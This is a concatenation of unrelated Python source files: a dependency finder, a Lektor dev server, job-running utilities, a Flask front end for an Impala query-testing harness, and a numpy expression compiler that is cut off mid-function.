returned - otherwise, don't return prereleases
unless they're all that's available.
Return a set of :class:`Distribution` instances and a set of
problems.
The distribushunz returned should be such that they have the
:attr:`required` attribute set to ``True`` if they were
from the ``requirement`` passed to ``find()``, and they have the
:attr:`build_time_dependency` attribute set to ``True`` unless they
are post-installation dependencies of the ``requirement``.
The problems should be a tuple consisting of the string
``'unsatisfied'`` and the requirement which couldn't be satisfied
by any distribution known to the locator.
"""
self.provided = {}
self.dists = {}
self.dists_by_name = {}
self.reqts = {}
meta_extras = set(meta_extras or [])
if ':*:' in meta_extras:
meta_extras.remove(':*:')
# :meta: and :run: are implicitly included
meta_extras |= set([':test:', ':build:', ':dev:'])
if isinstance(requirement, Distribution):
dist = odist = requirement
logger.debug('passed %s as requirement', odist)
else:
dist = odist = self.locator.locate(requirement,
prereleases=prereleases)
if dist is None:
raise DistlibException('Unable to locate %r' % requirement)
logger.debug('located %s', odist)
dist.requested = True
problems = set()
todo = set([dist])
install_dists = set([odist])
while todo:
dist = todo.pop()
name = dist.key # case-insensitive
if name not in self.dists_by_name:
self.add_distribution(dist)
else:
#import pdb; pdb.set_trace()
other = self.dists_by_name[name]
if other != dist:
self.try_to_replace(dist, other, problems)
ireqts = dist.run_requires | dist.meta_requires
sreqts = dist.build_requires
ereqts = set()
if meta_extras and dist in install_dists:
for key in ('test', 'build', 'dev'):
e = ':%s:' % key
if e in meta_extras:
ereqts |= getattr(dist, '%s_requires' % key)
all_reqts = ireqts | sreqts | ereqts
for r in all_reqts:
providers = self.find_providers(r)
if not providers:
logger.debug('No providers found for %r', r)
provider = self.locator.locate(r, prereleases=prereleases)
# If no provider is found and we didn't consider
# prereleases, consider them now.
if provider is None and not prereleases:
provider = self.locator.locate(r, prereleases=True)
if provider is None:
logger.debug('Cannot satisfy %r', r)
problems.add(('unsatisfied', r))
else:
n, v = provider.key, provider.version
if (n, v) not in self.dists:
todo.add(provider)
providers.add(provider)
if r in ireqts and dist in install_dists:
install_dists.add(provider)
logger.debug('Adding %s to install_dists',
provider.name_and_version)
for p in providers:
name = p.key
if name not in self.dists_by_name:
self.reqts.setdefault(p, set()).add(r)
else:
other = self.dists_by_name[name]
if other != p:
# see if other can be replaced by p
self.try_to_replace(p, other, problems)
dists = set(self.dists.values())
for dist in dists:
dist.build_time_dependency = dist not in install_dists
if dist.build_time_dependency:
logger.debug('%s is a build-time dependency only.',
dist.name_and_version)
logger.debug('find done for %s', odist)
return dists, problems
|
devserver.py | import os
import time
import traceback
import threading
from werkzeug.serving import run_simple, WSGIRequestHandler
from lektor.db import Database
from lektor.builder import Builder, process_build_flags
from lektor.watcher import Watcher
from lektor.reporter import CliReporter
from lektor.admin import WebAdmin
from lektor.utils import portable_popen
_os_alt_seps = list(sep for sep in [os.path.sep, os.path.altsep]
if sep not in (None, '/'))
class SilentWSGIRequestHandler(WSGIRequestHandler):
def log(self, type, message, *args):
pass
class BackgroundBuilder(threading.Thread):
def __init__(self, env, output_path, verbosity=0, build_flags=None):
threading.Thread.__init__(self)
watcher = Watcher(env, output_path)
watcher.observer.start()
self.env = env
self.watcher = watcher
self.output_path = output_path
self.verbosity = verbosity
self.last_build = time.time()
self.build_flags = build_flags
def build(self, update_source_info_first=False):
try:
db = Database(self.env)
builder = Builder(db.new_pad(), self.output_path,
build_flags=self.build_flags)
if update_source_info_first:
builder.update_all_source_infos()
builder.build_all()
builder.prune()
except Exception:
traceback.print_exc()
else:
self.last_build = time.time()
def run(self):
with CliReporter(self.env, verbosity=self.verbosity):
self.build(update_source_info_first=True)
for ts, _, _ in self.watcher:
if self.last_build is None or ts > self.last_build:
self.build()
class DevTools(object):
"""This provides extra helpers for launching tools such as webpack."""
def __init__(self, env):
self.watcher = None
self.env = env
def start(self):
if self.watcher is not None:
return
from lektor import admin
admin = os.path.dirname(admin.__file__)
portable_popen(['npm', 'install', '.'], cwd=admin).wait()
self.watcher = portable_popen([os.path.join(
admin, 'node_modules/.bin/webpack'), '--watch'],
cwd=os.path.join(admin, 'static'))
def stop(self):
if self.watcher is None:
return
self.watcher.kill()
self.watcher.wait()
self.watcher = None
def browse_to_address(addr):
import webbrowser
def browse():
time.sleep(1)
webbrowser.open('http://%s:%s' % addr)
t = threading.Thread(target=browse)
t.setDaemon(True)
t.start()
def run_server(bindaddr, env, output_path, verbosity=0, lektor_dev=False,
ui_lang='en', browse=False, build_flags=None):
"""This runs a server but also spawns a background process. It's
not safe to call this more than once per python process!
"""
wz_as_main = os.environ.get('WERKZEUG_RUN_MAIN') == 'true'
in_main_process = not lektor_dev or wz_as_main
build_flags = process_build_flags(build_flags)
if in_main_process:
background_builder = BackgroundBuilder(env, output_path, verbosity,
build_flags)
background_builder.setDaemon(True)
background_builder.start()
env.plugin_controller.emit('server-spawn', bindaddr=bindaddr,
build_flags=build_flags)
app = WebAdmin(env, output_path=output_path, verbosity=verbosity,
debug=lektor_dev, ui_lang=ui_lang,
build_flags=build_flags)
dt = None
if lektor_dev and not wz_as_main:
dt = DevTools(env)
dt.start()
if browse:
browse_to_address(bindaddr)
try:
return run_simple(bindaddr[0], bindaddr[1], app,
use_debugger=True, threaded=True,
use_reloader=lektor_dev,
request_handler=not lektor_dev
and SilentWSGIRequestHandler or WSGIRequestHandler)
finally:
if dt is not None:
dt.stop()
if in_main_process:
env.plugin_controller.emit('server-stop')
|
_utils.py | # -*- coding: utf-8 -*-
#
# Copyright 2015 Ternaris, Munich, Germany
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from __future__ import absolute_import, division
import inspect
import json
import re
from Queue import Queue
from itertools import tee
from collections import namedtuple
from threading import Thread
from .globals import _job_ctx_stack
from .model import db, Jobrun
def multiplex(inputs, processors, logger=None, dont_catch=False):
"""tee inputs, feed to each processor and return multiplexed outputs"""
generators = []
zipped = zip(processors, tee(inputs, len(processors)))
for processor, _inputs in zipped:
if dont_catch:
generator = processor(_inputs)
assert inspect.isgenerator(generator)
else:
try:
generator = processor(_inputs)
except:
import traceback
if logger:
logger.error(traceback.format_exc())
else:
traceback.print_exc() # noqa #pragma nocoverage
continue
generators.append(generator)
while generators:
for outputs in generators:
if dont_catch:
try:
yield outputs.next()
except StopIteration:
generators.remove(outputs)
continue
try:
yield outputs.next()
except StopIteration:
generators.remove(outputs)
except:
import traceback
if logger:
logger.error(traceback.format_exc())
else:
traceback.print_exc() # noqa #pragma nocoverage
generators.remove(outputs)
def title_from_name(name):
return re.sub('(\A|_)(.)',
lambda m: (m.group(1) and ' ') + m.group(2).upper(), name)
AsyncJob = namedtuple('AsyncJob', ['thread', 'msg_queue', 'rv_queue',
'name', 'fileset_id', 'version',
'jobrun_id', 'topics'])
class Done(object):
pass
Done = Done()
class Failed(object):
pass
Failed = Failed()
class EffectiveConfig(object):
def __init__(self, cfg):
self.cfg = cfg
def make_async_job(app, name, job, topics, group, version, config, fileset_id):
if config is None:
config = {}
msg_queue = Queue()
rv_queue = Queue()
def messages():
while True:
x = msg_queue.get()
if x is Done:
msg_queue.task_done()
break
yield x
msg_queue.task_done()
def async_job(app, messages, jobrun_id):
with app.app_context():
try:
db.create_all()
cfg, rv_generator = \
job(jobrun_id=jobrun_id, messages=messages(), **config)
rv_queue.put(EffectiveConfig(cfg))
for rv in rv_generator:
rv_queue.put(rv)
except:
import traceback
traceback.print_exc()
rv_queue.put(Failed)
finally:
_job_ctx_stack.pop()
rv_queue.put(Done)
db.session.remove()
jobrun = Jobrun(name=name, version=version, fileset_id=fileset_id)
db.session.add(jobrun)
db.session.commit()
thread = Thread(target=async_job, name=name, args=(app, messages, jobrun.id))
thread.daemon = True
thread.start()
return AsyncJob(thread=thread, msg_queue=msg_queue, topics=topics,
rv_queue=rv_queue, name=name, version=version,
fileset_id=fileset_id, jobrun_id=jobrun.id)
def async_job_milker(app, async_job):
with app.app_context():
db.create_all()
jobrun = Jobrun.query.filter(Jobrun.id == async_job.jobrun_id).first()
try:
while True:
res = async_job.rv_queue.get()
if isinstance(res, EffectiveConfig):
jobrun.config = json.dumps(res.cfg)
continue
if res is Done:
jobrun.succeeded = True
db.session.commit()
break
if res is Failed:
jobrun.failed = True
db.session.commit()
break
instance = res
instance.jobrun = jobrun
db.session.add(instance)
db.session.commit()
except:
import traceback
traceback.print_exc() # noqa #pragma nocoverage
jobrun.failed = True
db.session.commit()
finally:
db.session.remove()
|
job.py | """
**job** module handles all the job running logic:
- consistent exception handling and logging
- currently 2 job runners are implemented:
- SimpleJobRunner runs the jobs sequentially.
- ParallelJobRunner queues the jobs and run them in a dedicated thread
"""
from concurrent.futures import ThreadPoolExecutor, ProcessPoolExecutor
from enum import Enum, auto
import logging
import math
import queue
import signal
import threading
import time
from .utils import Namespace, Timer, InterruptTimeout, is_main_thread, raise_in_thread, signal_handler
log = logging.getLogger(__name__)
class State(Enum):
created = auto()
cancelled = auto()
running = auto()
rescheduled = auto()
stopping = auto()
stopped = auto()
class JobError(Exception):
pass
class InvalidStateError(JobError):
pass
class CancelledError(JobError):
pass
class Job:
def __init__(self, name="", timeout_secs=None, priority=None, raise_exceptions=False):
"""
:param name:
:param timeout_secs:
:param priority:
:param raise_exceptions: bool (default=False)
If True, log and raise any Exception that caused a job failure.
If False, only log the exception.
"""
self.name = name
self.timeout = timeout_secs
self.priority = priority
self.state = State.created
self.thread_id = None
self.raise_exceptions = raise_exceptions
def start(self):
try:
start_msg = "Starting job {}.".format(self.name)
self.thread_id = threading.current_thread().ident
if self.state == State.stopping:
self.state = State.cancelled
raise CancelledError("Job was cancelled.")
elif self.state != State.created:
self.state = State.cancelled
raise InvalidStateError("Job can't be started from state `{}`.".format(self.state))
log.info("\n%s\n%s", '-'*len(start_msg), start_msg)
self.state = State.running
self._prepare()
with Timer() as t:
with InterruptTimeout(self.timeout,
interruptions=[
dict(sig=None), # first trying sig=None to avoid propagation of the interruption error: this way we can collect the timeout in the result
dict(sig=signal.SIGINT if is_main_thread() else signal.SIGTERM), # if main thread, try a graceful interruption.
dict(sig=signal.SIGQUIT), # graceful doesn't work, let's talk seriously.
dict(sig=signal.SIGKILL),
],
wait_retry_secs=60 # escalates every minute if the previous interruption was ineffective
):
result = self._run()
log.info("Job %s executed in %.3f seconds.", self.name, t.duration)
log.debug("Job %s returned: %s", self.name, result)
return result, t.duration
except Exception as e:
log.exception("Job `%s` failed with error: %s", self.name, str(e))
if self.raise_exceptions:
raise
return None, -1
def stop(self):
try:
self.state = State.stopping
self._stop()
return 0
except Exception as e:
log.exception("Job `%s` did not stop gracefully: %s", self.name, str(e))
return 1
def done(self):
try:
if self.state in [State.rescheduled, State.running, State.stopping]:
self._on_done()
except Exception as e:
log.exception("Job `%s` completion failed with error: %s", self.name, str(e))
finally:
if self.state is State.rescheduled:
self.reset()
else:
self.reset(State.stopped)
def reschedule(self):
self.state = State.rescheduled
self.thread_id = None
def reset(self, state=State.created):
self.state = state
self.thread_id = None
def _prepare(self):
"""hood to execute pre-run logic: this is executed in the same thread as the run logic."""
pass
def _run(self):
"""jobs should implement their run logic in this method."""
pass
def _stop(self):
if self.thread_id is not None:
raise_in_thread(self.thread_id, CancelledError)
def _on_done(self):
"""hook to execute logic after job completion in a thread-safe way as this is executed in the main thread."""
pass
class JobRunner:
def __init__(self, jobs):
self.jobs = jobs
self.results = []
self.state = State.created
self._queue = None
self._last_priority = 0
def start(self):
if self.state != State.created:
raise InvalidStateError(self.state)
self._init_queue()
self.state = State.running
with Timer() as t:
self._run()
self.state = State.stopped
log.info("All jobs executed in %.3f seconds.", t.duration)
return self.results
def stop(self):
self.state = State.stopping
self._queue.put((-1, None))
return self._stop()
def stop_if_complete(self):
if 0 < len(self.jobs) == len(self.results):
self.stop()
def put(self, job, priority=None):
if priority is None:
if job.priority is None:
job.priority = self._last_priority = self._last_priority+1
else:
job.priority = priority
self._queue.put((job.priority, job))
def _init_queue(self):
self._queue = queue.PriorityQueue(maxsize=len(self.jobs))
for job in self.jobs:
self.put(job)
def __iter__(self):
return self
def __next__(self):
if self._queue is None:
return
_, job = self._queue.get()
self._queue.task_done()
if job is None:
self._queue = None
return
return job
def _run(self):
pass
def _stop(self):
for job in self.jobs:
job.stop()
class SimpleJobRunner(JobRunner):
def _run(self):
for job in self:
if self.state == State.stopping:
break
result, duration = job.start()
if job.state is not State.rescheduled:
self.results.append(Namespace(name=job.name, result=result, duration=duration))
job.done()
self.stop_if_complete()
class MultiThreadingJobRunner(JobRunner):
def __init__(self, jobs, parallel_jobs=1, done_async=True, delay_secs=0, use_daemons=False):
super().__init__(jobs)
self.parallel_jobs = parallel_jobs
self._done_async = done_async
self._delay = delay_secs # short sleep between enqueued jobs to make console more readable
self._daemons = use_daemons
def _run(self):
signal_handler(signal.SIGINT, self.stop)
signal_handler(signal.SIGTERM, self.stop)
q = queue.Queue()
def worker():
while True:
job = q.get()
if job is None or self.state == State.stopping:
q.task_done()
break
result, duration = job.start()
if job.state is not State.rescheduled:
self.results.append(Namespace(name=job.name, result=result, duration=duration))
if self._done_async:
job.done()
self.stop_if_complete()
q.task_done()
threads = []
for thread in range(self.parallel_jobs):
thread = threading.Thread(target=worker, daemon=self._daemons)
thread.start()
threads.append(thread)
try:
for job in self:
if self.state == State.stopping:
break
q.put(job) # TODO: timeout
if self._delay > 0:
time.sleep(self._delay)
q.join()
finally:
for _ in range(self.parallel_jobs):
q.put(None) # stopping workers
for thread in threads:
thread.join()
if not self._done_async:
for job in self.jobs:
job.done()
class MultiProcessingJobRunner(JobRunner):
pass
""" Experimental: trying to simplify multi-threading/processing"""
class ExecutorJobRunner(JobRunner):
def __init__(self, pool_executor_class, jobs, parallel_jobs):
super().__init__(jobs)
self.pool_executor_class = pool_executor_class
self.parallel_jobs = parallel_jobs
def _run(self):
def worker(job):
result, duration = job.start()
job.done()
return Namespace(name=job.name, result=result, duration=duration)
with self.pool_executor_class(max_workers=self.parallel_jobs) as executor:
self.results.extend(executor.map(worker, self.jobs))
# futures = []
# for job in self.jobs:
# future = executor.submit(worker, job)
# # future.add_done_callback(lambda _: job.done())
# futures.append(future)
# for future in as_completed(futures):
# self.results.append(future.result())
class ThreadPoolExecutorJobRunner(ExecutorJobRunner):
def __init__(self, jobs, parallel_jobs):
super().__init__(ThreadPoolExecutor, jobs, parallel_jobs)
class ProcessPoolExecutorJobRunner(ExecutorJobRunner):
def __init__(self, jobs, parallel_jobs):
super().__init__(ProcessPoolExecutor, jobs, parallel_jobs)
|
front_end.py | #!/usr/bin/env impala-python
# Copyright (c) 2015 Cloudera, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pickle
import os
import time
import stat
from time import sleep
from flask import Flask, render_template, request
from schedule_item import ScheduleItem
from controller import PATH_TO_REPORTS, PATH_TO_SCHEDULE
from threading import Thread
from tests.comparison.query_profile import DefaultProfile
from tests.comparison.db_types import (
Boolean,
Char,
Decimal,
Float,
Int,
TYPES,
Timestamp)
MAX_REPORT_AGE = 21 * 24 * 3600 # 21 days
SLEEP_LENGTH = 20 * 60 # 20 min
app = Flask(__name__)
app.reports = {}
ASSETS = {'bootstrap_css': 'css/bootstrap.min.css',
'hljs_css': 'css/default.css',
'favicon': 'favicon.ico',
'bootstrap_js': 'js/bootstrap.min.js',
'hljs_js': 'js/highlight.pack.js'}
@app.route('/reports/<report_id>')
def show_report(report_id):
'''Renders a report as HTML. '''
if report_id not in app.reports:
with open(os.path.join(PATH_TO_REPORTS, report_id), 'r') as f:
app.reports[report_id] = pickle.load(f)
report = app.reports[report_id]
def get_next_id():
'''Generates all natural numbers. '''
i = 0
while True:
yield str(i)
i += 1
gen = get_next_id()
# Generate HTML for displaying the crashes
outer_crashes_list = []
for first_impala_frame in report.grouped_stacks:
crashes_list = []
# results are sorted on the length of the query SQL
for result in sorted(report.grouped_stacks[first_impala_frame],
key = lambda result: len(result['test_sql'])):
inner_id = next(gen)
inner_title = 'Lines in Stack: {0}'.format(
len(result['formatted_stack'].split('\n')))
content = ('<h4>Impala Query:</h4><pre><code>{0}</code></pre>'
'<h4>Stack:</h4><pre>{1}</pre>').format(
result['test_sql'], result['formatted_stack'][:50000])
crashes_list.append((inner_id, inner_title, content))
id = next(gen)
title = first_impala_frame
outer_crashes_list.append((id, title, crashes_list))
# Generate HTML for displaying result row count mismatches
row_count_list = []
for result in sorted(report.grouped_results['row_counts'],
key = lambda result: len(result['test_sql'])):
id = next(gen)
title = 'Impala Rows: {0}, Postgres Rows: {1}'.format(
result['test_row_count'], result['ref_row_count'])
content = ('<h4>Impala Query:</h4><pre><code>{0}</code></pre>'
'<h4>Postgres Query:</h4><pre><code>{1}</code></pre>').format(
result['test_sql'], result['ref_sql'])
row_count_list.append((id, title, content))
# Generate HTML for displaying result content mismatches
mismatch_list = []
for result in sorted(report.grouped_results['mismatch'],
key = lambda result: len(result['test_sql'])):
id = next(gen)
title = 'Query Length: {0}'.format(len(result['test_sql']))
content = ('<h4>Impala Query:</h4><pre><code>{0}</code></pre>'
'<h4>Postgres Query:</h4><pre><code>{1}</code></pre>'
'<h4>Mismatch Impala Row:</h4><pre><code>{2}</code></pre>'
'<h4>Mismatch Postgres Row:</h4><pre><code>{3}</code></pre>').format(
result['test_sql'],
result['ref_sql'],
result['mismatch_test_row'],
result['mismatch_ref_row'])
mismatch_list.append((id, title, content))
return render_template(
'report.template',
assets=ASSETS,
report=report,
outer_crashes_list=outer_crashes_list,
row_count_list=row_count_list,
mismatch_list=mismatch_list)
@app.route('/start_run', methods=['POST', 'GET'])
def start_run():
'''Method that receives POST requests and gernerates a schedule item.'''
if request.method != 'POST': return 'fail'
if 'time_limit' in request.form:
# This is a custom run because time_limit item is present only in the custom_run form.
# Values will be extracted from the form and a new profile will be generated.
new_profile = DefaultProfile()
# Bounds
new_profile._bounds['MAX_NESTED_QUERY_COUNT'] = (
int(request.form['max_nested_query_count_from']),
int(request.form['max_nested_query_count_to']))
new_profile._bounds['MAX_NESTED_EXPR_COUNT'] = (
int(request.form['max_nested_expr_count_from']),
int(request.form['max_nested_expr_count_to']))
new_profile._bounds['SELECT_ITEM_COUNT'] = (
int(request.form['select_item_count_from']),
int(request.form['select_item_count_to']))
new_profile._bounds['WITH_TABLE_COUNT'] = (
int(request.form['with_table_count_from']),
int(request.form['with_table_count_to']))
new_profile._bounds['TABLE_COUNT'] = (
int(request.form['table_count_from']),
int(request.form['table_count_to']))
new_profile._bounds['ANALYTIC_LEAD_LAG_OFFSET'] = (
int(request.form['analytic_lead_lag_offset_from']),
int(request.form['analytic_lead_lag_offset_to']))
new_profile._bounds['ANALYTIC_WINDOW_OFFSET'] = (
int(request.form['analytic_window_offset_from']),
int(request.form['analytic_window_offset_to']))
# Select Item Category
new_profile._weights['SELECT_ITEM_CATEGORY']['AGG'] = int(
request.form['select_agg'])
new_profile._weights['SELECT_ITEM_CATEGORY']['ANALYTIC'] = int(
request.form['select_analytic'])
new_profile._weights['SELECT_ITEM_CATEGORY']['BASIC'] = int(
request.form['select_basic'])
# Types
new_profile._weights['TYPES'][Boolean] = int(request.form['types_boolean'])
new_profile._weights['TYPES'][Char] = int(request.form['types_char'])
new_profile._weights['TYPES'][Decimal] = int(request.form['types_decimal'])
new_profile._weights['TYPES'][Float] = int(request.form['types_float'])
new_profile._weights['TYPES'][Int] = int(request.form['types_int'])
new_profile._weights['TYPES'][Timestamp] = int(request.form['types_timestamp'])
# Join
new_profile._weights['JOIN']['INNER'] = int(request.form['join_inner'])
new_profile._weights['JOIN']['LEFT'] = int(request.form['join_left'])
new_profile._weights['JOIN']['RIGHT'] = int(request.form['join_right'])
new_profile._weights['JOIN']['FULL_OUTER'] = int(request.form['join_full_outer'])
new_profile._weights['JOIN']['CROSS'] = int(request.form['join_cross'])
# Optional Query Clauses Probabilities
new_profile._probabilities['OPTIONAL_QUERY_CLAUSES']['WITH'] = float(
request.form['optional_with'])
new_profile._probabilities['OPTIONAL_QUERY_CLAUSES']['FROM'] = float(
request.form['optional_from'])
new_profile._probabilities['OPTIONAL_QUERY_CLAUSES']['WHERE'] = float(
request.form['optional_where'])
new_profile._probabilities['OPTIONAL_QUERY_CLAUSES']['GROUP_BY'] = float(
request.form['optional_group_by'])
new_profile._probabilities['OPTIONAL_QUERY_CLAUSES']['HAVING'] = float(
request.form['optional_having'])
new_profile._probabilities['OPTIONAL_QUERY_CLAUSES']['UNION'] = float(
request.form['optional_union'])
new_profile._probabilities['OPTIONAL_QUERY_CLAUSES']['ORDER_BY'] = float(
request.form['optional_order_by'])
# Optional Analytic Clauses Probabilities
new_profile._probabilities['OPTIONAL_ANALYTIC_CLAUSES']['PARTITION_BY'] = float(
request.form['optional_analytic_partition_by'])
new_profile._probabilities['OPTIONAL_ANALYTIC_CLAUSES']['ORDER_BY'] = float(
request.form['optional_analytic_order_by'])
new_profile._probabilities['OPTIONAL_ANALYTIC_CLAUSES']['WINDOW'] = float(
request.form['optional_analytic_window'])
# Misc Probabilities
new_profile._probabilities['MISC']['INLINE_VIEW'] = float(
request.form['misc_inline_view'])
new_profile._probabilities['MISC']['SELECT_DISTINCT'] = float(
request.form['misc_select_distinct'])
new_profile._probabilities['MISC']['SCALAR_SUBQUERY'] = float(
request.form['misc_scalar_subquery'])
new_profile._probabilities['MISC']['UNION_ALL'] = float(
request.form['misc_union_all'])
# Analytic Designs
new_profile._flags['ANALYTIC_DESIGNS']['TOP_LEVEL_QUERY_WITHOUT_LIMIT'] = \
'analytic_designs_top_level_no_limit' in request.form
new_profile._flags['ANALYTIC_DESIGNS']['DETERMINISTIC_ORDER_BY'] = \
'analytic_designs_deterministic_order_by' in request.form
new_profile._flags['ANALYTIC_DESIGNS']['NO_ORDER_BY'] = \
'analytic_designs_no_order_by' in request.form
new_profile._flags['ANALYTIC_DESIGNS']['ONLY_SELECT_ITEM'] = \
'analytic_designs_only_select_item' in request.form
new_profile._flags['ANALYTIC_DESIGNS']['UNBOUNDED_WINDOW'] = \
'analytic_designs_unbounded_window' in request.form
new_profile._flags['ANALYTIC_DESIGNS']['RANK_FUNC'] = \
'analytic_designs_rank_func' in request.form
schedule_item = ScheduleItem(
run_name = request.form['run_name'],
query_profile = new_profile,
time_limit_sec = int(request.form['time_limit']),
git_command = request.form['git_command'],
parent_job = '')
else:
# Run based on previous run
schedule_item = ScheduleItem(
run_name = request.form['run_name'],
query_profile = DefaultProfile(),
time_limit_sec = 24 * 3600, # Default time limit is 24 hours
git_command = request.form['git_command'],
parent_job = request.form['report_id'])
schedule_item.save_pickle()
return 'success'
@app.route("/custom_run")
def custom_run():
'''Render the custom run page.
'''
return render_template(
'custom_run.template',
assets=ASSETS)
def reload_reports():
'''Reload reports in the reports directory every 20 minutes. Loaded reports are placed
into app.reports. This allows new reports to appear on the front page. Only reports
from the past 7 days are loaded. This method should be run in a separate thread.
'''
while True:
new_reports = {}
report_ids = os.listdir(PATH_TO_REPORTS)
for report_id in report_ids:
file_age = time.time() - os.stat(
os.path.join(PATH_TO_REPORTS, report_id))[stat.ST_MTIME]
if file_age < MAX_REPORT_AGE:
# We want this report
if report_id in app.reports:
new_reports[report_id] = app.reports[report_id]
else:
with open(os.path.join(PATH_TO_REPORTS, report_id), 'r') as f:
new_reports[report_id] = pickle.load(f)
app.reports = new_reports
sleep(SLEEP_LENGTH)
@app.route("/")
def front_page():
'''Renders the front page as HTML.
'''
schedule_item_ids = os.listdir(PATH_TO_SCHEDULE)
schedule_items = []
for schedule_item_id in schedule_item_ids:
schedule_items.append(pickle.load(
open(os.path.join(PATH_TO_SCHEDULE, schedule_item_id), 'r')))
return render_template(
'index.template',
assets=ASSETS,
reports=sorted(
app.reports.items(), key=lambda (k, report): report.run_date, reverse=True),
schedule_items=schedule_items)
if __name__ == '__main__':
thread = Thread(target=reload_reports)
thread.daemon = True
thread.start()
app.run(host='0.0.0.0', debug=False)
|
numpy_compiler.py |
from .lambda_compiler import LambdaCompiler,visitor
import numpy as np
from .. import expression as e
from .. import functions as f
from mpmath import mp
class NumpyCompiler(LambdaCompiler):
def __init__(self):
super(NumpyCompiler,self).__init__()
@visitor.on('expr',parent = LambdaCompiler)
def visit(self,expr):
raise ValueError('cannot compile expression: %s' % expr)
def get_function(self,name):
func = None
if name in np.__dict__:
return np.__dict__[name]
if name[0] == 'a':
arcname = 'arc' + name[1:]
if arcname in np.__dict__:
return np.__dict__[arcname]
return None
@visitor.function(f.InnerPiecewise)
def visit(self,expr):
restype = f.Type(expr).evaluate(cache=self.cache).value
if isinstance(restype ,f.TypeInfo):
ptype = restype .__dict__.get('python_type')
else:
ptype = None
cond_args = [self.visit(arg.args[1]) for arg in expr.args ]
eval_args = [self.visit(arg.args[0]) for arg in expr.args ]
def evaluate(args):
#dtype = ptype if ptype is not None else args['_dtype']
#shape = args['_shape']
#res = np.zeros(shape,dtype = dtype)
#unset = np.ones(shape,dtype = bool)
is_arr = False
for cond,val in zip(cond_args,eval_args):
valid = cond(args)
if not isinstance(valid,np.ndarray) or valid.shape == [1]:
if valid == False:
continue
if valid == True:
if not is_arr:
return val(args)
valid = unset
else:
if not is_arr:
if np.all(valid):
return val(args)
if np.all(valid==False):
continue
shape = valid.shape
is_arr = True
unset = np.ones(shape,dtype = bool)
if ptype:
res = np.zeros(shape,dtype = ptype)
else:
res = np.zeros(shape)
valid &= unset
new_args = { name:arg[valid] if isinstance(arg,np.ndarray) and arg.shape==shape else arg
for name,arg in args.iteritems() }
values = np.array(val(new_args))
if not np.can_cast(values.dtype,res.dtype):
res = res.astype(values.dtype)
res[valid] = values
unset &= np.logical_not(valid)
return res
return evaluate
@visitor.obj(e.Number)
def visit(self,expr):
v = expr.value
return lambda args:v
@visitor.function(f.Not)
def visit(self,expr):
arg = self.visit(expr.args[0])
return lambda args:np.logical_not( arg(args) )
@visitor.function(f.Max)
def visit(self,expr):
arguments = [self.visit(arg) for arg in expr.args]
return lambda args:np.maximum( *[arg(args) for arg in arguments] )
@visitor.function(f.Min)
def visit(self,expr):
arguments = [self.visit(arg) for arg in expr.args]
return lambda args:np.minimum( *[arg(args) for arg in arguments] )
@visitor.function(f.ArrayAccess)
def visit(self,expr):
array = expr.args[0].value
indices = [self.visit(arg) for arg in expr.args[1:]]
def access_function(args):
idx = [arg(args) for arg in indices[::-1]]
shape = None
for i in idx:
if isinstance(i,np.ndarray):
shape = i.shape
break
if shape != None:
idx = [arg.astype(int) if isinstance(arg,np.ndarray) else int(arg)*np.ones(shape,dtype=int)
for arg in idx]
else:
idx = [int(arg) for arg in idx]
valid = reduce(np.logical_and,[ (i >= 0) & (i<s) for i,s in zip(idx,array.shape) ])
if np.all(valid):
return array[tuple(idx)]
if np.all(valid == False):
return self.value_converter(0)
res = np.zeros(valid.shape,dtype = array.dtype)
idx = [i[valid] for i in idx]
res[valid] = array[tuple(idx)]
return res
return access_function
@visitor.obj(mp.mpc)
def visit(self,expr):
return lambda args:complex(expr.value)
@visitor.obj(mp.mpf)
def visit(self,expr):
return lambda args:float(expr.value)
def get_example_arg(args):
for arg in args.values():
if isinstance(arg,np.ndarray):
return arg
for arg in args.values():
if hasattr(arg,"__len__"):
return arg
return args.values()[0]
def prepare_arguments(args):
example_arg = get_example_arg(args)
if not hasattr(example_arg,"__len__"):
shape = None
args = { name:np.array([arg]) for name,arg in args.iteritems() }
else:
shape = np.array(example_arg).shape
args = { name:(np.array(arg) if hasattr(arg,"__len__") else arg) for name,arg in args.iteritems() }
return args,shape
def make_parallel(f):
import threading
from multiprocessing import cpu_count
def run_parallel_thread(_processes = cpu_count(),**args):
args,shape = prepare_arguments(args)
size = shape[0] if shape else 1
_processes = min(size,_processes)
if _processes == 1:
return f(**args)
step = int(size/_processes)
slices = [[i*step,(i+1)*step] for i in range(_processes)]
slices[-1][1] = size
result = np.zeros(shape,dtype = f.restype)
def worker(s,args):
args = {name:(value[s[0]:s[1]]) if isinstance(value,np.ndarray) and value.shape==shape else value for name,value in args.iteritems()}
args['_slice'] = s
result[s[0]:s[1]] = f(**args)
threads = []
for s in slices:
t = threading.Thread(target=worker,args=[s,args])
threads.append(t)
t.start()
for t in threads:
t.join()
return result
return run_parallel_thread
def numpyfy(expr,parallel = False,restype = None):
from expresso.pycas.evaluators.optimizers import optimize_for_compilation
compiler = NumpyCompiler()
res = compiler.visit(optimize_for_compilation(e.S(expr)))
if restype is None:
restype = f.Type(expr).evaluate(cache=compiler.cache).value
if isinstance(restype,f.TypeInfo):
restype = restype.__dict__.get('python_type')
if restype == None:
restype = complex
else:
restype = complex
def call(**args):
args,shape = prepare_arguments(args)
